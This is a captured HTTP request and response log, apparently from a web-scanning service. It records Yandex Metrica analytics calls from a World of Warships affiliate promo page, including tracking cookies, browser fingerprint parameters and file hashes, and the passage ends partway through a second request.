                                        
                                            GET /watch/14976586?wmode=7&page-url=https%3A%2F%2Fpromo.worldofwarships.eu%2Fglows-46780%2Feu-no%2F%3Ft%3D1%26pub_id%3D1287%26xid%3D6392bc9709e8870001471b53%26xid_param1%3DE0CDNGBJ6R%26xid_param_2%3D%26sid%3DSIDmA6uoEkq27UWF6r58VJAWfVUu4m5_oQd-9Zdso9495ceZERy_s4rHCVhEbT-DQrAE-cNC9XHqWgP7zV00rhUKg92F4wO48lsQWHe7tL3whPcmU361GEVVgbB9jeLK28hnNEyx-DMLfAHzA%26enctid%3Dcox0f7zg6w15%26lpsn%3DWOWS%2Btemplate1%2Bnew%2Banimated%2Blp-v1%26foris%3D1%26teclient%3D1670560920082270349%26utm_source%3Dwlap%26utm_medium%3Daffiliate%26utm_campaign%3Dujoxix0l%26utm_content%3D1287&charset=utf-8&browser-info=pv%3A1%3Avf%3A1931hwv4ldos2hv9k9dzvr%3Afp%3A866%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A941%3Acn%3A3%3Adp%3A0%3Als%3A683677183937%3Ahid%3A228847429%3Az%3A0%3Ai%3A20221209044200%3Aet%3A1670560920%3Ac%3A1%3Arn%3A1031475197%3Arqn%3A1%3Au%3A1670560920163701553%3Aw%3A1280x939%3As%3A1280x1024x24%3Ask%3A1%3Awv%3A2%3Ads%3A67%2C21%2C8%2C0%2C517%2C0%2C%2C258%2C56%2C%2C%2C%2C880%3Aco%3A0%3Ans%3A1670560918757%3Afip%3Aa81f3b9bcdd80a361c14af38dc09b309-a81f3b9bcdd80a361c14af38dc09b309-a81f3b9bcdd80a361c14af38dc09b309-4bd84c89c35a312599d807af285e7b5f-4335742423629acc806791d3e9f585f3-5b56a9f28e63b1a76c5f94a136cc484e-61b9878bbce18de73aafc8582a198c0c-e9c964637c807fcca817e718cc2d1338-a81f3b9bcdd80a361c14af38dc09b309-5cbccea2ed3dd5c7a75380ef1cbfadf6-2facd2c41a0047c68391f933b930bc3a%3Arqnl%3A1%3Ast%3A1670560920%3At%3AWorld%C2%A0of%C2%A0Warships%E2%80%94massive%C2%A0naval%C2%A0clashes.%C2%A0Take%C2%A0command%C2%A0of%C2%A0legendary%C2%A0vessels%C2%A0from%C2%A0the%C2%A0early%C2%A020th%C2%A0century%C2%A0and%C2%A0fight%C2%A0for%C2%A0domination%C2%A0on%C2%A0the%C2%A0high%C2%A0seas.&t=gdpr(14)mc(g-2)clc(0-0-0)rqnt(1)aw(1)fip(1)ti(2) HTTP/1.1 
Host: mc.yandex.ru
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://promo.worldofwarships.eu
Connection: keep-alive
Referer: https://promo.worldofwarships.eu/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         87.250.250.119
HTTP/2 302 Found
                                        
location: /watch/14976586/1?wmode=7&page-url=https%3A%2F%2Fpromo.worldofwarships.eu%2Fglows-46780%2Feu-no%2F%3Ft%3D1%26pub_id%3D1287%26xid%3D6392bc9709e8870001471b53%26xid_param1%3DE0CDNGBJ6R%26xid_param_2%3D%26sid%3DSIDmA6uoEkq27UWF6r58VJAWfVUu4m5_oQd-9Zdso9495ceZERy_s4rHCVhEbT-DQrAE-cNC9XHqWgP7zV00rhUKg92F4wO48lsQWHe7tL3whPcmU361GEVVgbB9jeLK28hnNEyx-DMLfAHzA%26enctid%3Dcox0f7zg6w15%26lpsn%3DWOWS%2Btemplate1%2Bnew%2Banimated%2Blp-v1%26foris%3D1%26teclient%3D1670560920082270349%26utm_source%3Dwlap%26utm_medium%3Daffiliate%26utm_campaign%3Dujoxix0l%26utm_content%3D1287&charset=utf-8&browser-info=pv%3A1%3Avf%3A1931hwv4ldos2hv9k9dzvr%3Afp%3A866%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A941%3Acn%3A3%3Adp%3A0%3Als%3A683677183937%3Ahid%3A228847429%3Az%3A0%3Ai%3A20221209044200%3Aet%3A1670560920%3Ac%3A1%3Arn%3A1031475197%3Arqn%3A1%3Au%3A1670560920163701553%3Aw%3A1280x939%3As%3A1280x1024x24%3Ask%3A1%3Awv%3A2%3Ads%3A67%2C21%2C8%2C0%2C517%2C0%2C%2C258%2C56%2C%2C%2C%2C880%3Aco%3A0%3Ans%3A1670560918757%3Afip%3Aa81f3b9bcdd80a361c14af38dc09b309-a81f3b9bcdd80a361c14af38dc09b309-a81f3b9bcdd80a361c14af38dc09b309-4bd84c89c35a312599d807af285e7b5f-4335742423629acc806791d3e9f585f3-5b56a9f28e63b1a76c5f94a136cc484e-61b9878bbce18de73aafc8582a198c0c-e9c964637c807fcca817e718cc2d1338-a81f3b9bcdd80a361c14af38dc09b309-5cbccea2ed3dd5c7a75380ef1cbfadf6-2facd2c41a0047c68391f933b930bc3a%3Arqnl%3A1%3Ast%3A1670560920%3At%3AWorld%C2%A0of%C2%A0Warships%E2%80%94massive%C2%A0naval%C2%A0clashes.%C2%A0Take%C2%A0command%C2%A0of%C2%A0legendary%C2%A0vessels%C2%A0from%C2%A0the%C2%A0early%C2%A020th%C2%A0century%C2%A0and%C2%A0fight%C2%A0for%C2%A0domination%C2%A0on%C2%A0the%C2%A0high%C2%A0seas.&t=gdpr%2814%29mc%28g-2%29clc%280-0-0%29rqnt%281%29aw%281%29fip%281%29ti%282%29
date: Fri, 09 Dec 2022 04:42:01 GMT
access-control-allow-origin: https://promo.worldofwarships.eu
set-cookie: yabs-sid=949382901670560921; Path=/; SameSite=None; Secure i=74PB50hIKPWEZGAClhzYJxim1jfs676RoTMjMqFKAsE2JW/GiqkwyVj9sDF2KcbFUzA6T/C+eRnBohW93eqpCsitxpo=; Expires=Mon, 06-Dec-2032 04:42:00 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly; SameSite=None yandexuid=4536366461670560921; Expires=Sat, 09-Dec-2023 04:42:01 GMT; Domain=.yandex.ru; Path=/; SameSite=None; Secure yuidss=4536366461670560921; Expires=Sat, 09-Dec-2023 04:42:01 GMT; Domain=.yandex.ru; Path=/; SameSite=None; Secure ymex=1702096921.yc.1670560921#1702096921.yrts.1670560921#1702096921.yrtsi.1670560921; Expires=Sat, 09-Dec-2023 04:42:01 GMT; Domain=.yandex.ru; Path=/; SameSite=None; Secure
access-control-allow-credentials: true
pragma: no-cache
x-xss-protection: 1; mode=block
expires: Fri, 09-Dec-2022 04:42:01 GMT
last-modified: Fri, 09-Dec-2022 04:42:01 GMT
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (419), with no line terminators
Size:   419
Md5:    6950cdba09f0b1b75e88d31228622053
Sha1:   63982e5dc673496f4aa4a5655f649d700c57e266
Sha256: cc5f9c0b5ec2a4d83aa0c865544df57642e56ec6ea671f50c53f6857c8c6b3c2
                                        
                                            GET /watch/71343676/1?wmode=7&page-url=https%3A%2F%2Fpromo.worldofwarships.eu%2Fglows-46780%2Feu-no%2F%3Ft%3D1%26pub_id%3D1287%26xid%3D6392bc9709e8870001471b53%26xid_param1%3DE0CDNGBJ6R%26xid_param_2%3D%26sid%3DSIDmA6uoEkq27UWF6r58VJAWfVUu4m5_oQd-9Zdso9495ceZERy_s4rHCVhEbT-DQrAE-cNC9XHqWgP7zV00rhUKg92F4wO48lsQWHe7tL3whPcmU361GEVVgbB9jeLK28hnNEyx-DMLfAHzA%26enctid%3Dcox0f7zg6w15%26lpsn%3DWOWS%2Btemplate1%2Bnew%2Banimated%2Blp-v1%26foris%3D1%26teclient%3D1670560920082270349%26utm_source%3Dwlap%26utm_medium%3Daffiliate%26utm_campaign%3Dujoxix0l%26utm_content%3D1287&charset=utf-8&browser-info=pv%3A1%3Avf%3A1931hwv4ldos2hv9k9dzvr%3Afp%3A866%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A941%3Acn%3A2%3Adp%3A0%